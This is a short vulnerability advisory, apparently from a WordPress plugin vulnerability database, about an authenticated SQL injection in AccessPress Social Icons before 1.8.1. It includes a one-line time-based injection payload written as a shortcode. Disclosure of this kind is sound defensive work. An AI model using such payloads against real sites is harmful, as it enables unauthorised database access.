WordPress Plugin Vulnerabilities

AccessPress Social Icons < 1.8.1 - Authenticated SQL Injection

Description

The plugin does not sanitise its widget attribute, allowing accounts with post permission, such as author, to perform SQL injections.

Proof of Concept

https://drive.google.com/file/d/1UBTpW3RcPR7iqTi94ueyXLwWH8aFHuoe/view?usp=sharing

Payload: [aps-social id="1 and sleep(3)"]

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
Submitter
khanh
Verified
Yes

Timeline

Publicly Published
2020-11-02 (about 3 years ago)
Added
2020-11-02 (about 3 years ago)
Last Updated
2021-01-22 (about 3 years ago)

Other